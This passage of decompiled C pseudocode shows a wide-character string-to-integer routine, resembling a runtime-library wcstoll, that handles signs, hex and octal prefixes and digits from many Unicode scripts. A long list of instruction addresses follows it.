				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed short* _v164;
				void* __edi;
				void* __ebp;
				signed short* _t177;
				signed int _t179;
				signed short* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				intOrPtr _t187;
				void* _t188;
				signed char _t190;
				signed int _t191;
				intOrPtr _t193;
				signed int _t194;
				signed int _t198;
				void* _t199;
				signed int _t200;
				signed int _t205;
				signed int _t206;
				intOrPtr _t212;
				signed int _t215;
				intOrPtr* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t221;
				signed int* _t225;
				signed int _t227;
				void* _t230;
				signed short* _t231;
				void* _t234;
				signed int _t236;
				signed short* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed short* _t246;
				signed int _t249;
				signed int _t250;

				if(E0137E1BF( &_a8) == 0) {
					L5:
					_t217 = _a12;
					if(_t217 != 0) {
						 *_t217 = _a8;
					}
					L138:
					return 0;
				}
				_t241 = _a16;
				if(_t241 == 0 || _t241 >= 2 && _t241 <= 0x24) {
					_t177 = _a8;
					_t215 = 0;
					_t218 = _a4;
					_v12 = _v12 & 0x00000000;
					_v164 = _t177;
					_t249 =  *_t177 & 0x0000ffff;
					_a8 =  &(_t177[1]);
					__eflags =  *(_t218 + 0x14);
					if( *(_t218 + 0x14) == 0) {
						E01371420(_t218, _t234);
					}
					while(1) {
						_t179 = E01389C09(_t218, _t249, 8);
						_pop(_t218);
						__eflags = _t179;
						if(_t179 == 0) {
							break;
						}
						_t180 = _a8;
						_t249 =  *_t180 & 0x0000ffff;
						_t181 =  &(_t180[1]);
						__eflags = _t181;
						_a8 = _t181;
					}
					_t182 = _a20 & 0x000000ff;
					_v8 = _t182;
					__eflags = _t249 - 0x2d;
					if(_t249 != 0x2d) {
						__eflags = _t249 - 0x2b;
						if(_t249 != 0x2b) {
							_t236 = _a8;
							L16:
							_v16 = 0x3a;
							_v148 = 0x660;
							_v20 = 0x66a;
							_v24 = 0x6f0;
							_v28 = 0x6fa;
							_v32 = 0x966;
							_v36 = 0x970;
							_v40 = 0x9e6;
							_v44 = 0x9f0;
							_v48 = 0xa66;
							_v52 = 0xa70;
							_v56 = 0xae6;
							_v60 = 0xaf0;
							_v64 = 0xb66;
							_v68 = 0xb70;
							_v72 = 0xc66;
							_v76 = 0xc70;
							_v80 = 0xce6;
							_v84 = 0xcf0;
							_v88 = 0xd66;
							_v92 = 0xd70;
							_v96 = 0xe50;
							_v100 = 0xe5a;
							_v104 = 0xed0;
							_v108 = 0xeda;
							_v112 = 0xf20;
							_v116 = 0xf2a;
							_v120 = 0x1040;
							_v124 = 0x104a;
							_v128 = 0x17e0;
							_v132 = 0x17ea;
							_v136 = 0x1810;
							_v140 = 0x181a;
							_v144 = 0xff1a;
							_t220 = 0x30;
							__eflags = _t241;
							if(_t241 == 0) {
								L18:
								__eflags = _t249 - _t220;
								if(_t249 < _t220) {
									L58:
									_t184 = _t249 & 0x0000ffff;
									__eflags = _t184 - 0x41;
									if(_t184 < 0x41) {
										L61:
										_t92 = _t184 - 0x61; // 0xfeaf
										_t221 = _t92;
										__eflags = _t221 - 0x19;
										if(_t221 > 0x19) {
											L74:
											__eflags = _t241;
											if(_t241 == 0) {
												_t241 = 0xa;
												_a16 = _t241;
											}
											L76:
											_t185 = _t241;
											asm("cdq");
											_t222 = _t236;
											_v152 = _t241;
											_v16 = _t236;
											_v160 = L01383E00(0xffffffff, 0xffffffff, _t185, _t222);
											_v156 = _t236;
											while(1) {
												_t187 = 0x30;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												_t230 = 0x3a;
												__eflags = _t249 - _t230;
												if(_t249 < _t230) {
													L114:
													_t243 = (_t249 & 0x0000ffff) - _t187;
													__eflags = _t243 - 0xffffffff;
													if(_t243 != 0xffffffff) {
														L123:
														__eflags = _t243 - _a16;
														if(_t243 >= _a16) {
															E0137E1E5( &_a8, _t249);
															_t190 = _v8;
															__eflags = _t190 & 0x00000008;
															if((_t190 & 0x00000008) != 0) {
																_t244 = _v12;
																_t191 = E01383D37(_t190, _t244, _t215);
																__eflags = _t191;
																if(_t191 == 0) {
																	__eflags = _v8 & 0x00000002;
																	if((_v8 & 0x00000002) != 0) {
																		_t244 =  ~_t244;
																		asm("adc ebx, 0x0");
																		_t215 =  ~_t215;
																	}
																	L151:
																	_t250 = _a12;
																	__eflags = _t250;
																	if(_t250 != 0) {
																		 *_t250 = _a8;
																	}
																	return _t244;
																}
																_t193 = _a4;
																 *((char*)(_t193 + 0x1c)) = 1;
																 *((intOrPtr*)(_t193 + 0x18)) = 0x22;
																_t194 = _v8;
																__eflags = _t194 & 0x00000001;
																if((_t194 & 0x00000001) != 0) {
																	_t225 = _a12;
																	__eflags = _t194 & 0x00000002;
																	if((_t194 & 0x00000002) == 0) {
																		__eflags = _t225;
																		if(_t225 != 0) {
																			_t194 = _a8;
																			 *_t225 = _t194;
																		}
																		return _t194 | 0xffffffff;
																	}
																	__eflags = _t225;
																	if(_t225 != 0) {
																		 *_t225 = _a8;
																	}
																	return 0;
																}
																_t244 = _t244 | 0xffffffff;
																_t215 = _t215 | 0xffffffff;
																goto L151;
															}
															_t198 = _a12;
															__eflags = _t198;
															if(_t198 != 0) {
																 *_t198 = _v164;
															}
															goto L138;
														}
														_t199 = E01389D90(_v152, _v16, _v12, _t215);
														_t245 = _t243 + _t199;
														asm("adc esi, edx");
														__eflags = _t215 - _v156;
														if(__eflags < 0) {
															L128:
															_t227 = 0;
															__eflags = 0;
															L129:
															__eflags = 0 - _t236;
															if(__eflags > 0) {
																L133:
																_t200 = 0;
																__eflags = 0;
																L134:
																_v12 = _t245;
																_t246 = _a8;
																_t215 = 0;
																_v8 = _v8 | (_t200 | _t227) << 0x00000002 | 0x00000008;
																_t249 =  *_t246 & 0x0000ffff;
																_a8 =  &(_t246[1]);
																continue;
															}
															if(__eflags < 0) {
																L132:
																_t200 = 1;
																goto L134;
															}
															__eflags = _t245 - _t199;
															if(_t245 >= _t199) {
																goto L133;
															}
															goto L132;
														}
														if(__eflags > 0) {
															L127:
															_t227 = 1;
															goto L129;
														}
														__eflags = _v12 - _v160;
														if(_v12 <= _v160) {
															goto L128;
														}
														goto L127;
													}
													goto L115;
												}
												_t187 = 0xff10;
												__eflags = _t249 - 0xff10;
												if(_t249 >= 0xff10) {
													__eflags = _t249 - _v144;
													L113:
													if(__eflags >= 0) {
														goto L115;
													}
													goto L114;
												}
												_t187 = _v148;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v20;
												if(_t249 < _v20) {
													goto L114;
												}
												_t187 = _v24;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v28;
												if(_t249 < _v28) {
													goto L114;
												}
												_t187 = _v32;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v36;
												if(_t249 < _v36) {
													goto L114;
												}
												_t187 = _v40;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v44;
												if(_t249 < _v44) {
													goto L114;
												}
												_t187 = _v48;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v52;
												if(_t249 < _v52) {
													goto L114;
												}
												_t187 = _v56;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v60;
												if(_t249 < _v60) {
													goto L114;
												}
												_t187 = _v64;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v68;
												if(_t249 < _v68) {
													goto L114;
												}
												_t187 = _v72;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v76;
												if(_t249 < _v76) {
													goto L114;
												}
												_t187 = _v80;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v84;
												if(_t249 < _v84) {
													goto L114;
												}
												_t187 = _v88;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v92;
												if(_t249 < _v92) {
													goto L114;
												}
												_t187 = _v96;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v100;
												if(_t249 < _v100) {
													goto L114;
												}
												_t187 = _v104;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v108;
												if(_t249 < _v108) {
													goto L114;
												}
												_t187 = _v112;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v116;
												if(_t249 < _v116) {
													goto L114;
												}
												_t187 = _v120;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v124;
												if(_t249 < _v124) {
													goto L114;
												}
												_t187 = _v128;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v132;
												if(_t249 < _v132) {
													goto L114;
												}
												_t187 = _v136;
												__eflags = _t249 - _t187;
												if(_t249 < _t187) {
													goto L115;
												}
												__eflags = _t249 - _v140;
												goto L113;
												L115:
												_t242 = _t249 & 0x0000ffff;
												__eflags = _t242 - 0x41;
												if(_t242 < 0x41) {
													L118:
													_t138 = _t242 - 0x61; // -87
													_t188 = _t138;
													__eflags = _t188 - 0x19;
													if(_t188 > 0x19) {
														_t243 = _t242 | 0xffffffff;
														__eflags = _t243;
														goto L123;
													}
													L119:
													__eflags = _t188 - 0x19;
													if(_t188 <= 0x19) {
														_t242 = _t242 + 0xffffffe0;
														__eflags = _t242;
													}
													_t243 = _t242 + 0xffffffc9;
													goto L123;
												}
												__eflags = _t242 - 0x5a;
												if(_t242 > 0x5a) {
													goto L118;
												}
												_t137 = _t242 - 0x61; // -87
												_t188 = _t137;
												goto L119;
											}
										}
										L62:
										__eflags = _t221 - 0x19;
										if(_t221 <= 0x19) {
											_t184 = _t184 + 0xffffffe0;
											__eflags = _t184;
										}
										_t205 = _t184 + 0xffffffc9;
										__eflags = _t205;
										L65:
										__eflags = _t205;
										if(_t205 != 0) {
											goto L74;
										}
										_t206 =  *_t236 & 0x0000ffff;
										_t93 = _t236 + 2; // 0x2
										_t231 = _t93;
										_a8 = _t231;
										__eflags = _t206 - 0x78;
										if(_t206 == 0x78) {
											L71:
											__eflags = _t241;
											if(_t241 == 0) {
												_t241 = 0x10;
												_a16 = _t241;
											}
											_t249 =  *_t231 & 0x0000ffff;
											_a8 =  &(_t231[1]);
											goto L76;
										}
										__eflags = _t206 - 0x58;
										if(_t206 == 0x58) {
											goto L71;
										}
										__eflags = _t241;
										if(_t241 == 0) {
											_t241 = 8;
											_a16 = _t241;
										}
										E0137E1E5( &_a8, _t206);
										goto L76;
									}
									__eflags = _t184 - 0x5a;
									if(_t184 > 0x5a) {
										goto L61;
									}
									_t91 = _t184 - 0x61; // -97
									_t221 = _t91;
									goto L62;
								}
								__eflags = _t249 - _v16;
								if(_t249 >= _v16) {
									__eflags = _t249 - 0xff10;
									if(_t249 >= 0xff10) {
										__eflags = _t249 - _v144;
										if(_t249 >= _v144) {
											goto L58;
										}
										_t205 = (_t249 & 0x0000ffff) - 0xff10;
										__eflags = _t205;
										L57:
										__eflags = _t205 - 0xffffffff;
										if(_t205 != 0xffffffff) {
											goto L65;
										}
										goto L58;
									}
									_t220 = _v148;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v20;
									if(_t249 < _v20) {
										goto L20;
									}
									_t220 = _v24;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v28;
									if(_t249 < _v28) {
										goto L20;
									}
									_t220 = _v32;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v36;
									if(_t249 < _v36) {
										goto L20;
									}
									_t220 = _v40;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v44;
									if(_t249 < _v44) {
										goto L20;
									}
									_t220 = _v48;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v52;
									if(_t249 < _v52) {
										goto L20;
									}
									_t220 = _v56;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v60;
									if(_t249 < _v60) {
										goto L20;
									}
									_t220 = _v64;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v68;
									if(_t249 < _v68) {
										goto L20;
									}
									_t220 = _v72;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v76;
									if(_t249 < _v76) {
										goto L20;
									}
									_t220 = _v80;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v84;
									if(_t249 < _v84) {
										goto L20;
									}
									_t220 = _v88;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v92;
									if(_t249 < _v92) {
										goto L20;
									}
									_t220 = _v96;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v100;
									if(_t249 < _v100) {
										goto L20;
									}
									_t220 = _v104;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v108;
									if(_t249 < _v108) {
										goto L20;
									}
									_t220 = _v112;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v116;
									if(_t249 < _v116) {
										goto L20;
									}
									_t220 = _v120;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v124;
									if(_t249 < _v124) {
										goto L20;
									}
									_t220 = _v128;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v132;
									if(_t249 < _v132) {
										goto L20;
									}
									_t220 = _v136;
									__eflags = _t249 - _t220;
									if(_t249 < _t220) {
										goto L58;
									}
									__eflags = _t249 - _v140;
									if(_t249 >= _v140) {
										goto L58;
									}
								}
								L20:
								_t205 = (_t249 & 0x0000ffff) - _t220;
								goto L57;
							}
							__eflags = _t241 - 0x10;
							if(_t241 != 0x10) {
								goto L76;
							}
							goto L18;
						}
						L14:
						_t240 = _a8;
						_t249 =  *_t240 & 0x0000ffff;
						_t236 =  &(_t240[1]);
						_a8 = _t236;
						goto L16;
					}
					_v8 = _t182 | 0x00000002;
					goto L14;
				} else {
					_t212 = _a4;
					 *((char*)(_t212 + 0x1c)) = 1;
					 *((intOrPtr*)(_t212 + 0x18)) = 0x16;
					L01364E5B(_t241, 0, 0, 0, 0, 0, _t212);
					goto L5;
				}
			}



















































































                                                                                              0x013836c9
                                                                                              0x013836fa
                                                                                              0x013836fa
                                                                                              0x013836ff
                                                                                              0x01383708
                                                                                              0x01383708
                                                                                              0x01383cb4
                                                                                              0x00000000
                                                                                              0x01383cb6
                                                                                              0x013836cb
                                                                                              0x013836d0
                                                                                              0x0138370f
                                                                                              0x01383712
                                                                                              0x01383714
                                                                                              0x01383717
                                                                                              0x0138371b
                                                                                              0x01383721
                                                                                              0x01383727
                                                                                              0x0138372a
                                                                                              0x0138372d
                                                                                              0x0138372f
                                                                                              0x0138372f
                                                                                              0x01383742
                                                                                              0x01383745
                                                                                              0x0138374b
                                                                                              0x0138374c
                                                                                              0x0138374e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383736
                                                                                              0x01383739
                                                                                              0x0138373c
                                                                                              0x0138373c
                                                                                              0x0138373f
                                                                                              0x0138373f
                                                                                              0x01383750
                                                                                              0x01383754
                                                                                              0x01383757
                                                                                              0x0138375b
                                                                                              0x01383765
                                                                                              0x01383769
                                                                                              0x01383779
                                                                                              0x0138377c
                                                                                              0x0138377c
                                                                                              0x01383788
                                                                                              0x01383792
                                                                                              0x01383799
                                                                                              0x013837a0
                                                                                              0x013837a7
                                                                                              0x013837ae
                                                                                              0x013837b5
                                                                                              0x013837bc
                                                                                              0x013837c3
                                                                                              0x013837ca
                                                                                              0x013837d1
                                                                                              0x013837d8
                                                                                              0x013837df
                                                                                              0x013837e6
                                                                                              0x013837ed
                                                                                              0x013837f4
                                                                                              0x013837fb
                                                                                              0x01383802
                                                                                              0x01383809
                                                                                              0x01383810
                                                                                              0x01383817
                                                                                              0x0138381e
                                                                                              0x01383825
                                                                                              0x0138382c
                                                                                              0x01383833
                                                                                              0x0138383a
                                                                                              0x01383841
                                                                                              0x01383848
                                                                                              0x0138384f
                                                                                              0x01383856
                                                                                              0x0138385d
                                                                                              0x01383867
                                                                                              0x01383871
                                                                                              0x0138387d
                                                                                              0x0138387e
                                                                                              0x01383880
                                                                                              0x0138388b
                                                                                              0x0138388b
                                                                                              0x0138388e
                                                                                              0x01383a05
                                                                                              0x01383a05
                                                                                              0x01383a08
                                                                                              0x01383a0b
                                                                                              0x01383a17
                                                                                              0x01383a17
                                                                                              0x01383a17
                                                                                              0x01383a1a
                                                                                              0x01383a1d
                                                                                              0x01383a6b
                                                                                              0x01383a6b
                                                                                              0x01383a6d
                                                                                              0x01383a71
                                                                                              0x01383a72
                                                                                              0x01383a72
                                                                                              0x01383a75
                                                                                              0x01383a75
                                                                                              0x01383a77
                                                                                              0x01383a78
                                                                                              0x01383a7a
                                                                                              0x01383a86
                                                                                              0x01383a8e
                                                                                              0x01383a94
                                                                                              0x01383a9a
                                                                                              0x01383a9c
                                                                                              0x01383a9d
                                                                                              0x01383aa0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383aa8
                                                                                              0x01383aa9
                                                                                              0x01383aac
                                                                                              0x01383bf6
                                                                                              0x01383bf9
                                                                                              0x01383bfb
                                                                                              0x01383bfe
                                                                                              0x01383c2a
                                                                                              0x01383c2a
                                                                                              0x01383c2d
                                                                                              0x01383c99
                                                                                              0x01383c9e
                                                                                              0x01383ca1
                                                                                              0x01383ca3
                                                                                              0x01383cba
                                                                                              0x01383cc0
                                                                                              0x01383cc8
                                                                                              0x01383cca
                                                                                              0x01383d15
                                                                                              0x01383d19
                                                                                              0x01383d1b
                                                                                              0x01383d1d
                                                                                              0x01383d20
                                                                                              0x01383d20
                                                                                              0x01383d22
                                                                                              0x01383d22
                                                                                              0x01383d25
                                                                                              0x01383d27
                                                                                              0x01383d2c
                                                                                              0x01383d2c
                                                                                              0x00000000
                                                                                              0x01383d30
                                                                                              0x01383ccc
                                                                                              0x01383ccf
                                                                                              0x01383cd3
                                                                                              0x01383cda
                                                                                              0x01383cdd
                                                                                              0x01383cdf
                                                                                              0x01383ce9
                                                                                              0x01383cec
                                                                                              0x01383cee
                                                                                              0x01383d02
                                                                                              0x01383d04
                                                                                              0x01383d06
                                                                                              0x01383d09
                                                                                              0x01383d09
                                                                                              0x00000000
                                                                                              0x01383d0e
                                                                                              0x01383cf0
                                                                                              0x01383cf2
                                                                                              0x01383cf7
                                                                                              0x01383cf7
                                                                                              0x00000000
                                                                                              0x01383cfb
                                                                                              0x01383ce1
                                                                                              0x01383ce4
                                                                                              0x00000000
                                                                                              0x01383ce4
                                                                                              0x01383ca5
                                                                                              0x01383ca8
                                                                                              0x01383caa
                                                                                              0x01383cb2
                                                                                              0x01383cb2
                                                                                              0x00000000
                                                                                              0x01383caa
                                                                                              0x01383c3c
                                                                                              0x01383c43
                                                                                              0x01383c45
                                                                                              0x01383c47
                                                                                              0x01383c4d
                                                                                              0x01383c61
                                                                                              0x01383c61
                                                                                              0x01383c61
                                                                                              0x01383c63
                                                                                              0x01383c63
                                                                                              0x01383c65
                                                                                              0x01383c72
                                                                                              0x01383c72
                                                                                              0x01383c72
                                                                                              0x01383c74
                                                                                              0x01383c76
                                                                                              0x01383c79
                                                                                              0x01383c7c
                                                                                              0x01383c84
                                                                                              0x01383c87
                                                                                              0x01383c8d
                                                                                              0x00000000
                                                                                              0x01383c8d
                                                                                              0x01383c67
                                                                                              0x01383c6d
                                                                                              0x01383c6f
                                                                                              0x00000000
                                                                                              0x01383c6f
                                                                                              0x01383c69
                                                                                              0x01383c6b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383c6b
                                                                                              0x01383c4f
                                                                                              0x01383c5c
                                                                                              0x01383c5e
                                                                                              0x00000000
                                                                                              0x01383c5e
                                                                                              0x01383c57
                                                                                              0x01383c5a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383c5a
                                                                                              0x00000000
                                                                                              0x01383bfe
                                                                                              0x01383ab2
                                                                                              0x01383ab7
                                                                                              0x01383aba
                                                                                              0x01383bed
                                                                                              0x01383bf4
                                                                                              0x01383bf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bf4
                                                                                              0x01383ac0
                                                                                              0x01383ac6
                                                                                              0x01383ac9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383acf
                                                                                              0x01383ad3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383ad9
                                                                                              0x01383adc
                                                                                              0x01383adf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383ae5
                                                                                              0x01383ae9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383aef
                                                                                              0x01383af2
                                                                                              0x01383af5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383afb
                                                                                              0x01383aff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b05
                                                                                              0x01383b08
                                                                                              0x01383b0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b11
                                                                                              0x01383b15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b1b
                                                                                              0x01383b1e
                                                                                              0x01383b21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b27
                                                                                              0x01383b2b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b31
                                                                                              0x01383b34
                                                                                              0x01383b37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b3d
                                                                                              0x01383b41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b47
                                                                                              0x01383b4a
                                                                                              0x01383b4d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b53
                                                                                              0x01383b57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b5d
                                                                                              0x01383b60
                                                                                              0x01383b63
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b69
                                                                                              0x01383b6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b73
                                                                                              0x01383b76
                                                                                              0x01383b79
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b7f
                                                                                              0x01383b83
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b85
                                                                                              0x01383b88
                                                                                              0x01383b8b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b8d
                                                                                              0x01383b91
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b93
                                                                                              0x01383b96
                                                                                              0x01383b99
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383b9b
                                                                                              0x01383b9f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383ba1
                                                                                              0x01383ba4
                                                                                              0x01383ba7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383ba9
                                                                                              0x01383bad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383baf
                                                                                              0x01383bb2
                                                                                              0x01383bb5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bb7
                                                                                              0x01383bbb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bbd
                                                                                              0x01383bc0
                                                                                              0x01383bc3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bc5
                                                                                              0x01383bc9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bcb
                                                                                              0x01383bce
                                                                                              0x01383bd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bd3
                                                                                              0x01383bd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383bd9
                                                                                              0x01383bdf
                                                                                              0x01383be2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383be4
                                                                                              0x00000000
                                                                                              0x01383c00
                                                                                              0x01383c00
                                                                                              0x01383c03
                                                                                              0x01383c06
                                                                                              0x01383c12
                                                                                              0x01383c12
                                                                                              0x01383c12
                                                                                              0x01383c15
                                                                                              0x01383c18
                                                                                              0x01383c27
                                                                                              0x01383c27
                                                                                              0x00000000
                                                                                              0x01383c27
                                                                                              0x01383c1a
                                                                                              0x01383c1a
                                                                                              0x01383c1d
                                                                                              0x01383c1f
                                                                                              0x01383c1f
                                                                                              0x01383c1f
                                                                                              0x01383c22
                                                                                              0x00000000
                                                                                              0x01383c22
                                                                                              0x01383c08
                                                                                              0x01383c0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383c0d
                                                                                              0x01383c0d
                                                                                              0x00000000
                                                                                              0x01383c0d
                                                                                              0x01383a9a
                                                                                              0x01383a1f
                                                                                              0x01383a1f
                                                                                              0x01383a22
                                                                                              0x01383a24
                                                                                              0x01383a24
                                                                                              0x01383a24
                                                                                              0x01383a27
                                                                                              0x01383a27
                                                                                              0x01383a2a
                                                                                              0x01383a2a
                                                                                              0x01383a2c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383a2e
                                                                                              0x01383a31
                                                                                              0x01383a31
                                                                                              0x01383a34
                                                                                              0x01383a37
                                                                                              0x01383a3a
                                                                                              0x01383a56
                                                                                              0x01383a56
                                                                                              0x01383a58
                                                                                              0x01383a5c
                                                                                              0x01383a5d
                                                                                              0x01383a5d
                                                                                              0x01383a60
                                                                                              0x01383a66
                                                                                              0x00000000
                                                                                              0x01383a66
                                                                                              0x01383a3c
                                                                                              0x01383a3f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383a41
                                                                                              0x01383a43
                                                                                              0x01383a47
                                                                                              0x01383a48
                                                                                              0x01383a48
                                                                                              0x01383a4f
                                                                                              0x00000000
                                                                                              0x01383a4f
                                                                                              0x01383a0d
                                                                                              0x01383a10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383a12
                                                                                              0x01383a12
                                                                                              0x00000000
                                                                                              0x01383a12
                                                                                              0x01383894
                                                                                              0x01383898
                                                                                              0x013838a4
                                                                                              0x013838a7
                                                                                              0x013839ef
                                                                                              0x013839f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839fb
                                                                                              0x013839fb
                                                                                              0x01383a00
                                                                                              0x01383a00
                                                                                              0x01383a03
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383a03
                                                                                              0x013838ad
                                                                                              0x013838b3
                                                                                              0x013838b6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838bc
                                                                                              0x013838c0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838c2
                                                                                              0x013838c5
                                                                                              0x013838c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838ce
                                                                                              0x013838d2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838d4
                                                                                              0x013838d7
                                                                                              0x013838da
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838e0
                                                                                              0x013838e4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838e6
                                                                                              0x013838e9
                                                                                              0x013838ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838f2
                                                                                              0x013838f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013838f8
                                                                                              0x013838fb
                                                                                              0x013838fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383904
                                                                                              0x01383908
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138390a
                                                                                              0x0138390d
                                                                                              0x01383910
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383916
                                                                                              0x0138391a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383920
                                                                                              0x01383923
                                                                                              0x01383926
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138392c
                                                                                              0x01383930
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383936
                                                                                              0x01383939
                                                                                              0x0138393c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383942
                                                                                              0x01383946
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138394c
                                                                                              0x0138394f
                                                                                              0x01383952
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383958
                                                                                              0x0138395c
                                                                                              0x00000000
                                                                                              0x00000000
